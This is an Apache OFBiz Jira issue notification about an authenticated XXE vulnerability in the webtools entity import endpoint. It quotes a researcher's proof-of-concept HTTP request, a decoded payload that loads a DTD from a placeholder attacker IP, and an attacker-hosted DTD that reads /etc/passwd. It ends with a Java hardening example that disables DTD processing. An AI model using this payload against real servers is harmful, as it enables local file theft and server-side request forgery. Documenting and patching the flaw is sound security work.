[ https://issues.apache.org/jira/browse/OFBIZ-11197?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel ]
Jacques Le Roux closed OFBIZ-11197.
-----------------------------------
    Fix Version/s: 17.12.02
                   18.12.01
         Assignee: Jacques Le Roux
       Resolution: Fixed

This is fixed with OFBIZ-11470

> Arbitrary Code Execution
> ------------------------
>
>                 Key: OFBIZ-11197
>                 URL: https://issues.apache.org/jira/browse/OFBIZ-11197
>             Project: OFBiz
>          Issue Type: Sub-task
>          Components: framework/webtools
>    Affects Versions: Trunk
>            Reporter: Jacques Le Roux
>            Assignee: Jacques Le Roux
>            Priority: Major
>             Fix For: 18.12.01, 17.12.02
>
>
> This was reported to the OFBiz security team by Jason Nordenstam from offensive-security.com. We did not consider it as a real security issue because it requires authentication.
> {quote}
> Authenticated users can import XML documents containing DTDs. The SAX parser used by the XML Data Import functionality does not have DTD parsing explicitly disabled, which makes it vulnerable to XXE attacks.
> The results of the import are not displayed in the page, which means an 'error-based' approach is needed to read local files. The parser will also resolve external entities, so this vulnerability can also be used for internal port scanning or server-side request forgery.
>
> Affected URL:
> /webtools/control/entityImport
>
> POC Example Request:
> POST /webtools/control/entityImport HTTP/1.1
> Host: <host>
> User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0
> Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
> Accept-Language: en-US,en;q=0.5
> Accept-Encoding: gzip, deflate
> Referer: <host>/webtools/control/entityImport
> Content-Type: application/x-www-form-urlencoded
> Content-Length: 312
> Cookie: JSESSIONID=66A4289C95C78E5E7977EFF796A7D05B.jvm1; OFBiz.Visitor=10178
> Connection: close
> Upgrade-Insecure-Requests: 1
>
> fulltext=%3C%3Fxml+version%3D%221.0%22+encoding%3D%22utf-8%22%3F%3E%0D%0A%3C%21DOCTYPE+notfound+%5B%0D%0A+%3C%21ENTITY+%25+base+SYSTEM+%22http%3A%2F%2F<attacker_ip>%2Ferror.dtd%22%3E%0D%0A+%25base%3B%0D%0A+%25param1%3B+%0D%0A+%25external%3B%0D%0A%5D%3E%0D%0A%3Croot%3E%3Cfoo%3Ebar%3C%2Fbar%3E%3C%2Froot%3E%0D%0A
>
> Payload One Decoded:
> <?xml version="1.0" encoding="utf-8"?>
> <!DOCTYPE notfound [
> <!ENTITY % base SYSTEM "http://<attacker_ip>/error.dtd">
> %base;
> %param1;
> %external;
> ]>
> <root><foo>bar</bar></root>
>
> error.dtd on Attacking Machine:
> <!ENTITY % payload SYSTEM "file:///etc/passwd">
> <!ENTITY % param1 "<!ENTITY % external SYSTEM 'file:///banana/%payload;'>"
> {quote}
>
> Works using:
> Runtime rt = Runtime.getRuntime();
> rt.exec("curl https://demo-trunk.ofbiz.apache.org:9090/pingtest");
>
> We get:
> ofbizDemo@ofbiz-vm3:~$ python -m SimpleHTTPServer 9090
> Serving HTTP on 0.0.0.0 port 9090 ...
> 172.31.43.132 - - [31/Aug/2019 07:37:00] code 400, message Bad request syntax
> ("\x16\x03\x01\x02\x00\x01\x00\x01\xfc\x03\x03\x900q\xa3\xae
> a\xc4\r\xb6eA\xd8\x0bv/\x13k\xce\x01Q\xd4\xd3\x87w\\I\xca\x8b~\xab\xa4
> 2Re|\xdc\xcb\x85p\x8f\x8e\xab\xee\x04*\xe7\xcb\xfd\xba\x0eu\x14z\x91\xedN\xbd\x91\xb3jy\xae\xc7\x00>\x13\x02\x13\x03\x13\x01\xc0,\xc00\x00\x9f\xcc\xa9\xcc\xa8\xcc\xaa\xc0+\xc0/\x00\x9e\xc0$\xc0(\x00k\xc0#\xc0'\x00g\xc0")
> ¦eA¦31.43.132 - - [31/Aug/2019 07:37:00] "¦¦0q¦¦ a¦
> v/k¦Q¦?w\I?~¦¦ 2Re|¦?p¦¦¦¦*¦¦¦uz¦¦N¦¦¦jy¦¦>¦,¦0¦???¦+¦/¦¦$¦(k¦#¦'g¦" 400 -
>
> Not sure what we can really do with that on OFBiz server side, but clearly something happens



--
This message was sent by Atlassian Jira
(v8.3.4#803005)
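The report's root cause is a SAX parser that still honours DOCTYPE declarations and resolves external entities. The following Java class is an added illustration of the hardened parser configuration that closes that gap; it is not OFBiz code and not the fix applied under OFBIZ-11470. The class name `HardenedSaxImport`, the helper names `hardenedFactory` and `tryImport`, and both sample documents are assumptions constructed for the example; the feature URIs are the standard SAX/Xerces ones understood by the JDK's built-in parser.

```java
import java.io.ByteArrayInputStream;
import java.io.InputStream;
import java.nio.charset.StandardCharsets;
import javax.xml.XMLConstants;
import javax.xml.parsers.SAXParser;
import javax.xml.parsers.SAXParserFactory;
import org.xml.sax.SAXParseException;
import org.xml.sax.helpers.DefaultHandler;

// Hypothetical example class: a SAX parser set up so that XML data imports
// cannot carry a DTD or trigger external entity resolution.
public class HardenedSaxImport {

    // Builds a SAXParserFactory with DTD processing and external entity
    // resolution switched off.
    static SAXParserFactory hardenedFactory() throws Exception {
        SAXParserFactory f = SAXParserFactory.newInstance();
        // Reject any document that carries a DOCTYPE at all. With this set,
        // a payload like the report's <!DOCTYPE notfound [ ... ]> fails at
        // the declaration, before the parser ever tries to resolve %base;.
        f.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true);
        // Defence in depth for parsers that lack the feature above: no
        // external general or parameter entities, no external DTD loading.
        f.setFeature("http://xml.org/sax/features/external-general-entities", false);
        f.setFeature("http://xml.org/sax/features/external-parameter-entities", false);
        f.setFeature("http://apache.org/xml/features/nonvalidating/load-external-dtd", false);
        f.setXIncludeAware(false);
        f.setFeature(XMLConstants.FEATURE_SECURE_PROCESSING, true);
        return f;
    }

    // Parses the document with a no-op handler. Returns true when the
    // document is accepted and false when the parser rejects it; the
    // rejection reason is printed so an operator can log it.
    static boolean tryImport(String xml) throws Exception {
        SAXParser parser = hardenedFactory().newSAXParser();
        try (InputStream in = new ByteArrayInputStream(xml.getBytes(StandardCharsets.UTF_8))) {
            parser.parse(in, new DefaultHandler());
            return true;
        } catch (SAXParseException e) {
            System.out.println("rejected: " + e.getMessage());
            return false;
        }
    }

    public static void main(String[] args) throws Exception {
        // Constructed sample 1: a plain document without a DTD is accepted.
        String plain = "<?xml version=\"1.0\"?><root><foo>bar</foo></root>";
        System.out.println("plain accepted: " + tryImport(plain));

        // Constructed sample 2: any DOCTYPE is rejected, even one that only
        // declares a harmless internal entity. The same rejection applies to
        // a DOCTYPE that declares external parameter entities.
        String withDtd = "<?xml version=\"1.0\"?>"
                + "<!DOCTYPE root [<!ENTITY greeting \"hi\">]>"
                + "<root>&greeting;</root>";
        System.out.println("dtd accepted: " + tryImport(withDtd));
    }
}
```

Because `disallow-doctype-decl` stops parsing at the declaration itself, no outbound request for `error.dtd` and no local file access can happen, which also removes the SSRF and port-scanning angle the report mentions. A rejected import that is logged with the parser's message gives operators a simple detection signal for attempts against the endpoint.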